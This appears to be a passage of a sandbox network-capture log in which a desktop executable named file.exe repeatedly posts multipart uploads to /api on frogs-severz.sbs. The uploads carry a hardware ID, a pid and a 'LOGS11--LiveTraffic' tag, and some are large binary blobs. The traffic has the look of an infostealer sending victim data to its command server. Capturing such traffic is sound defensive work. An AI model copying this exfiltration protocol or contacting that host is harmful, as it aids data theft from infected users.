2024-11-25 07:44:21 UTC | 1369 | IN | Data Raw: 70 41 6a 72 4f 57 57 41 7a 69 4e 64 6e 61 48 6f 42 63 61 78 65 6d 46 32 38 52 38 6a 67 32 33 47 4b 32 4d 46 55 4a 49 47 46 6e 35 6f 4d 4c 39 39 63 4a 67 69 55 31 48 64 6c 64 67 67 37 73 42 47 4c 46 4c 78 44 6a 37 75 4a 4e 38 75 52 78 55 4e 6c 30 4d 6d 37 6d 42 63 6b 7a 68 6f 39 54 49 65 55 64 6d 38 33 56 58 47 33 47 6f 34 5a 76 45 65 4f 76 5a 31 36 68 4e 37 44 57 79 71 4d 67 70 75 5a 42 43 66 62 56 79 59 51 6c 4e 39 2b 62 33 34 42 50 50 4e 65 77 52 71 6a 43 39 44 34 71 6e 71 4c 33 38 56 4e 5a 5a 66 48 69 39 38 43 4a 70 34 43 59 67 4f 53 32 33 4a 73 64 41 34 77 75 51 4b 54 45 62 4a 44 6a 62 53 51 65 59 50 44 78 46 51 73 69 34 71 62 6d 41 30 6d 31 46 6b 6c 51 74 43 55 64 6e 73 33 56 58 47 51 42 35 45 51 2b 31 54 47 6f 64 74 77 69 5a 47 61 47 79 32 46 67 5a
Data Ascii: pAjrOWWAziNdnaHoBcaxemF28R8jg23GK2MFUJIGFn5oML99cJgiU1Hdldgg7sBGLFLxDj7uJN8uRxUNl0Mm7mBckzho9TIeUdm83VXG3Go4ZvEeOvZ16hN7DWyqMgpuZBCfbVyYQlN9+b34BPPNewRqjC9D4qnqL38VNZZfHi98CJp4CYgOS23JsdA4wuQKTEbJDjbSQeYPDxFQsi4qbmA0m1FklQtCUdns3VXGQB5EQ+1TGodtwiZGaGy2FgZ
2024-11-25 07:44:21 UTC | 1369 | IN | Data Raw: 31 31 34 71 41 5a 37 51 64 57 52 79 44 6a 32 34 46 34 49 53 76 30 4b 47 73 5a 51 33 79 35 48 46 51 32 58 51 79 62 4f 45 42 69 62 54 47 6a 31 4d 68 35 52 32 62 7a 64 56 63 62 38 65 68 42 32 78 54 59 79 39 6e 58 32 41 30 63 6c 59 4b 6f 79 50 6c 70 41 46 49 64 64 62 4a 41 65 55 33 33 64 75 64 41 73 33 38 31 37 42 47 71 4d 4c 30 50 69 37 62 49 6a 64 78 52 73 36 78 70 44 53 6d 41 6c 71 68 68 6f 70 44 70 72 54 63 57 35 30 42 54 53 33 47 6f 51 64 73 31 6d 41 75 4a 78 6c 6c 39 48 4c 58 69 6d 4c 69 5a 61 5a 44 43 7a 64 58 6d 4a 4d 33 74 4e 70 49 79 39 4e 48 4c 38 58 71 42 71 67 43 35 66 32 67 6a 65 43 33 59 49 44 5a 59 6d 43 6d 4a 41 49 4b 64 68 5a 4b 51 65 55 31 58 5a 72 65 68 38 79 76 42 2b 46 48 62 52 4e 6a 72 6d 55 63 59 4c 59 77 31 4d 69 79 4d 66 53 6d 42 31
Data Ascii: 114qAZ7QdWRyDj24F4ISv0KGsZQ3y5HFQ2XQybOEBibTGj1Mh5R2bzdVcb8ehB2xTYy9nX2A0clYKoyPlpAFIddbJAeU33dudAs3817BGqML0Pi7bIjdxRs6xpDSmAlqhhopDprTcW50BTS3GoQds1mAuJxll9HLXimLiZaZDCzdXmJM3tNpIy9NHL8XqBqgC5f2gjeC3YIDZYmCmJAIKdhZKQeU1XZreh8yvB+FHbRNjrmUcYLYw1MiyMfSmB1
2024-11-25 07:44:21 UTC | 1369 | IN | Data Raw: 67 57 4a 32 7a 45 74 4e 77 4a 78 36 79 6e 42 46 4c 78 51 6d 61 36 57 5a 34 4b 52 2f 52 56 6c 6b 4d 6e 4b 33 7a 41 70 30 46 51 6c 46 49 2b 5a 56 6e 56 39 43 69 47 30 42 34 35 64 39 51 75 4f 2b 4d 4d 6b 79 35 48 47 53 6d 58 51 32 63 44 45 55 48 6d 4a 43 6e 41 64 30 4d 30 78 64 54 64 56 59 2f 31 51 6b 31 33 6a 43 38 2b 37 69 57 57 44 30 74 52 59 59 72 61 33 74 59 55 49 4c 4d 6c 4c 48 44 79 5a 7a 6e 78 6c 59 42 78 39 70 68 4f 50 45 37 78 64 79 50 62 62 65 4d 57 4a 2b 78 74 74 79 4c 62 63 33 78 31 71 68 68 6f 58 41 5a 44 61 64 6e 56 6d 51 42 61 70 48 59 63 4b 71 67 76 47 2b 4a 30 33 33 59 47 4d 47 79 47 5a 79 63 72 50 56 33 47 4c 43 58 56 53 7a 4d 73 2f 65 6a 63 62 63 65 74 43 7a 31 32 70 43 39 44 34 33 48 53 58 77 38 52 59 4d 34 76 4f 72 4b 45 72 4c 64 68 66
Data Ascii: gWJ2zEtNwJx6ynBFLxQma6WZ4KR/RVlkMnK3zAp0FQlFI+ZVnV9CiG0B45d9QuO+MMky5HGSmXQ2cDEUHmJCnAd0M0xdTdVY/1Qk13jC8+7iWWD0tRYYra3tYUILMlLHDyZznxlYBx9phOPE7xdyPbbeMWJ+xttyLbc3x1qhhoXAZDadnVmQBapHYcKqgvG+J033YGMGyGZycrPV3GLCXVSzMs/ejcbcetCz12pC9D43HSXw8RYM4vOrKErLdhf
2024-11-25 07:44:21 UTC | 1369 | IN | Data Raw: 4e 6e 63 6a 6f 71 50 37 51 52 6c 77 32 73 52 4d 6a 32 32 33 48 46 69 5a 41 56 5a 59 79 59 30 73 64 56 65 49 55 50 63 56 58 4f 68 6d 34 74 62 6b 30 6e 38 30 6a 54 55 2f 74 5a 79 4f 44 62 4d 49 62 44 30 46 30 6d 6e 6f 72 56 6f 54 73 4e 30 46 30 6a 46 49 37 44 66 69 78 5a 4f 78 43 4e 4c 70 51 65 74 55 57 50 72 6f 6f 33 79 35 48 4e 47 33 32 78 79 64 72 66 4f 6d 53 65 51 6d 4a 61 33 75 46 79 62 58 6b 4b 4a 36 4a 64 70 68 4f 38 53 70 36 6f 6a 48 6a 4b 2f 2f 52 36 5a 63 62 4a 6c 4e 39 64 65 4a 41 61 4a 68 50 65 6a 43 45 78 4c 46 68 69 35 45 44 54 41 76 56 53 79 4b 37 62 4c 39 65 66 67 6b 6c 6c 30 4d 6e 56 6e 42 63 34 32 46 6b 30 41 64 6e 71 54 30 52 35 43 6a 43 6c 41 49 77 52 6d 6b 69 5a 73 71 56 4a 6b 4e 4c 4d 56 53 4b 65 6d 4e 4c 52 52 53 57 65 41 68 74 43 31
Data Ascii: NncjoqP7QRlw2sRMj223HFiZAVZYyY0sdVeIUPcVXOhm4tbk0n80jTU/tZyODbMIbD0F0mnorVoTsN0F0jFI7DfixZOxCNLpQetUWProo3y5HNG32xydrfOmSeQmJa3uFybXkKJ6JdphO8Sp6ojHjK//R6ZcbJlN9deJAaJhPejCExLFhi5EDTAvVSyK7bL9efgkll0MnVnBc42Fk0AdnqT0R5CjClAIwRmkiZsqVJkNLMVSKemNLRRSWeAhtC1
2024-11-25 07:44:21 UTC | 1369 | IN | Data Raw: 4a 4d 78 79 68 46 35 45 65 2b 57 65 50 74 5a 64 4a 75 2b 62 54 58 44 58 4b 72 35 47 4a 42 6d 71 51 47 6a 70 43 78 70 52 63 63 58 41 64 4d 76 45 38 68 68 43 33 43 35 66 32 67 6a 65 54 6b 5a 6f 49 61 38 69 62 30 73 64 46 62 64 31 49 4d 41 53 64 77 6e 49 6b 53 54 4d 63 6f 52 65 52 48 76 6c 36 68 62 79 4e 59 6f 62 42 78 57 55 62 70 5a 75 56 6a 77 5a 6f 2b 32 42 67 4d 34 6a 58 63 57 31 77 54 58 2f 7a 43 4d 46 46 2b 32 61 61 76 34 74 30 78 2f 54 34 47 52 53 65 69 70 4b 52 41 6d 72 42 46 44 74 43 69 4a 51 70 4d 44 6c 4e 49 2f 4e 49 77 56 71 31 52 6f 6d 37 6c 58 53 58 77 38 52 59 4d 34 76 4f 72 4b 45 71 49 64 39 4b 4c 78 4f 54 30 47 64 64 53 53 6f 33 74 68 65 2f 49 34 78 61 6a 36 6a 5a 55 59 62 48 77 52 74 72 79 4a 48 53 78 30 55 4e 32 46 38 6c 51 74 43 55 64 53
Data Ascii: JMxyhF5Ee+WePtZdJu+bTXDXKr5GJBmqQGjpCxpRccXAdMvE8hhC3C5f2gjeTkZoIa8ib0sdFbd1IMASdwnIkSTMcoReRHvl6hbyNYobBxWUbpZuVjwZo+2BgM4jXcW1wTX/zCMFF+2aav4t0x/T4GRSeipKRAmrBFDtCiJQpMDlNI/NIwVq1Rom7lXSXw8RYM4vOrKEqId9KLxOT0GddSSo3the/I4xaj6jZUYbHwRtryJHSx0UN2F8lQtCUdS


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49734 | 104.21.88.250 | 443 | 7660 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 07:44:23 UTC | 276 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=A5K45MZSF13L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12815
Host: frogs-severz.sbs
2024-11-25 07:44:23 UTC | 12815 | OUT | Data Raw: 2d 2d 41 35 4b 34 35 4d 5a 53 46 31 33 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 30 38 31 44 36 41 36 30 43 38 43 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 41 35 4b 34 35 4d 5a 53 46 31 33 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 35 4b 34 35 4d 5a 53 46 31 33 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 41 35 4b 34 35 4d 5a 53
Data Ascii: --A5K45MZSF13LContent-Disposition: form-data; name="hwid"E0081D6A60C8C436D7CBBD6DF28D3732--A5K45MZSF13LContent-Disposition: form-data; name="pid"2--A5K45MZSF13LContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--A5K45MZS
2024-11-25 07:44:23 UTC | 1010 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 07:44:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=k20lngete9gm5oh107tmhjoe7i; expires=Fri, 21-Mar-2025 01:31:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ciUF4KLlDaAs6XhKWS87WRnJZ4TfAiYHECttw1P2YY43HaQI9oys0GPGFNT7xDBMJIA4zZfW%2BhDRRiyjGHSS0Js9n51N157W%2FLjKWQjpbzBfpfoX6wD5Vh6d%2FhEZR3aRhbFf"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e800360db7c428b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1596&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13749&delivery_rate=1796923&cwnd=235&unsent_bytes=0&cid=d43bf1b943afd789&ts=962&x=0"
2024-11-25 07:44:23 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
Data Ascii: eok 8.46.123.75
2024-11-25 07:44:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49740 | 104.21.88.250 | 443 | 7660 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 07:44:25 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=P14SZ2J0R2C1792
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15051
Host: frogs-severz.sbs
2024-11-25 07:44:25 UTC | 15051 | OUT | Data Raw: 2d 2d 50 31 34 53 5a 32 4a 30 52 32 43 31 37 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 30 38 31 44 36 41 36 30 43 38 43 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 50 31 34 53 5a 32 4a 30 52 32 43 31 37 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 31 34 53 5a 32 4a 30 52 32 43 31 37 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
Data Ascii: --P14SZ2J0R2C1792Content-Disposition: form-data; name="hwid"E0081D6A60C8C436D7CBBD6DF28D3732--P14SZ2J0R2C1792Content-Disposition: form-data; name="pid"2--P14SZ2J0R2C1792Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
2024-11-25 07:44:26 UTC | 1010 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 07:44:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=nhmt17njucl75qmqdg30b08ag2; expires=Fri, 21-Mar-2025 01:31:05 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hmrztSjuA3DPjvgvvAEOULPK5rn6eA0YRqiGYZZl2sSJd9x6bIbkZdCrVdPyASk9NJnPWnCffrdBugpnWcvp937vAWXS0yKYG6k%2FouNzU4rExw8g9DybNQMUHnOEbm20%2BHxZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e80036fbe598cc5-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1972&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15988&delivery_rate=1411992&cwnd=243&unsent_bytes=0&cid=76ffa09ceafb60cb&ts=1119&x=0"
2024-11-25 07:44:26 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
Data Ascii: eok 8.46.123.75
2024-11-25 07:44:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.949746104.21.88.2504437660C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-25 07:44:28 UTC282OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=A8CHGFSQ06VHXG923T
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 20585
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-25 07:44:28 UTC15331OUTData Raw: 2d 2d 41 38 43 48 47 46 53 51 30 36 56 48 58 47 39 32 33 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 30 38 31 44 36 41 36 30 43 38 43 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 41 38 43 48 47 46 53 51 30 36 56 48 58 47 39 32 33 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 38 43 48 47 46 53 51 30 36 56 48 58 47 39 32 33 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                      Data Ascii: --A8CHGFSQ06VHXG923TContent-Disposition: form-data; name="hwid"E0081D6A60C8C436D7CBBD6DF28D3732--A8CHGFSQ06VHXG923TContent-Disposition: form-data; name="pid"3--A8CHGFSQ06VHXG923TContent-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                      2024-11-25 07:44:28 UTC | 5254 | OUT | Data Raw: 51 42 2d 3f 59 1d 59 90 6a 24 94 cb a5 d1 7c a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii: QB-?YYj$|lQJ$nInVZ+?:us}Q0u?4E([:s~
                                                                      2024-11-25 07:44:28 UTC | 1025 | IN | HTTP/1.1 200 OK
                                                                      Date: Mon, 25 Nov 2024 07:44:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=p2vg926ck8sftur4d4p2fkimmd; expires=Fri, 21-Mar-2025 01:31:07 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2FpjCcMWaeF%2BEKWMfKYIJtTgs3Mf%2BfxV3SuFNnpmLWNDtxxZi%2F4Ya7We2Z0%2F%2BOT1MAIZPW%2BqKMNU70qAxB%2BxgQR6FF83xOjR%2FtjWNwOufscYYjhoIypNM19QOMvVGGdCBsw%2B"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e8003807f9241c1-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1712&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21547&delivery_rate=1687861&cwnd=205&unsent_bytes=0&cid=3e12abc7364a0eec&ts=926&x=0"
                                                                      2024-11-25 07:44:28 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-25 07:44:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID: 5
                                                                      Source IP: 192.168.2.9
                                                                      Source Port: 49756
                                                                      Destination IP: 104.21.88.250
                                                                      Destination Port: 443
                                                                      PID: 7660
                                                                      Process: C:\Users\user\Desktop\file.exe

                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-11-25 07:44:30 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=03GZDEUN
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 1162
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-25 07:44:30 UTC | 1162 | OUT | Data Raw: 2d 2d 30 33 47 5a 44 45 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 30 38 31 44 36 41 36 30 43 38 43 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 30 33 47 5a 44 45 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 33 47 5a 44 45 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 33 47 5a 44 45 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                      Data Ascii: --03GZDEUNContent-Disposition: form-data; name="hwid"E0081D6A60C8C436D7CBBD6DF28D3732--03GZDEUNContent-Disposition: form-data; name="pid"1--03GZDEUNContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--03GZDEUNContent-Di
                                                                      2024-11-25 07:44:31 UTC | 1014 | IN | HTTP/1.1 200 OK
                                                                      Date: Mon, 25 Nov 2024 07:44:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=55fjb1ijcm5crgnksc1r8n65ad; expires=Fri, 21-Mar-2025 01:31:10 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dj5j8W9BnnzJcpqc41g5IhBltgqD5%2BXmfVSdHmXts0wjxCKhpQ6S%2FMOxqP1k%2BQG%2Bk2mZLwN7HptMGXADzezth1zYeyJNAPlk6cXjy3V%2BdaSwP4OUO1xAHV%2FH1murgWXB7JsO"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e800390fb234361-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1729&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2069&delivery_rate=1659090&cwnd=218&unsent_bytes=0&cid=2f62b4e4e39444bb&ts=727&x=0"
                                                                      2024-11-25 07:44:31 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-25 07:44:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID: 6
                                                                      Source IP: 192.168.2.9
                                                                      Source Port: 49765
                                                                      Destination IP: 104.21.88.250
                                                                      Destination Port: 443
                                                                      PID: 7660
                                                                      Process: C:\Users\user\Desktop\file.exe

                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-11-25 07:44:33 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=DH8RDUB2KBUN
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 551295
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-25 07:44:33 UTC | 15331 | OUT | Data Raw: 2d 2d 44 48 38 52 44 55 42 32 4b 42 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 30 38 31 44 36 41 36 30 43 38 43 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 44 48 38 52 44 55 42 32 4b 42 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 48 38 52 44 55 42 32 4b 42 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 44 48 38 52 44 55 42 32
                                                                      Data Ascii: --DH8RDUB2KBUNContent-Disposition: form-data; name="hwid"E0081D6A60C8C436D7CBBD6DF28D3732--DH8RDUB2KBUNContent-Disposition: form-data; name="pid"1--DH8RDUB2KBUNContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--DH8RDUB2
                                                                      2024-11-25 07:44:33 UTC | 15331 | OUT | Data Raw: 83 df da d9 59 11 65 10 82 ef 8e b1 c1 0d 71 17 9f 41 70 0d 54 2e 8b d7 6e 84 0b dc 80 39 7b e8 cb f9 8b ac 6b fd 63 10 22 f4 e7 3e 60 f7 7a 31 48 3b 78 36 f1 2e 0c a7 45 75 5a 06 7a 8d 93 53 2c e5 4d 61 14 44 7c 0c 1d 11 84 28 7f 22 4a 8b 31 b4 13 82 45 07 76 f4 ab 52 f3 9c da 1c 13 f9 86 e6 eb 83 f9 aa 6e e7 ad f0 83 da ad 63 76 3f c6 6a 8c ac 76 b1 6a 3b ef 4e 3a bc 1a 1e 94 b7 7b 9d c1 be 62 f7 a3 75 c6 b1 d4 d7 f1 f2 37 6b 14 63 b4 39 55 cb 16 74 5f 0b c6 b3 70 49 a9 e8 42 fe 45 ff ca 40 b2 3a 53 95 72 ef 25 0e 74 9f 92 a7 39 8d 74 e4 e8 a3 a8 48 e2 de 7d 5b 66 8f a6 26 1e 74 97 ea 81 9a cf 18 70 d6 fa 3c 22 e8 08 fd 05 e8 c2 2e 2d 9a 0a 6a 81 7d fc 16 45 cf 98 a2 cf 2e 38 61 2a bc 8f 79 fb cd 4b 8d 42 65 11 39 b9 88 4b bb b3 f7 eb fa 79 1d 7f 5d 60
                                                                      Data Ascii: YeqApT.n9{kc">`z1H;x6.EuZzS,MaD|("J1EvRncv?jvj;N:{bu7kc9Ut_pIBE@:Sr%t9tH}[f&tp<".-j}E.8a*yKBe9Ky]`
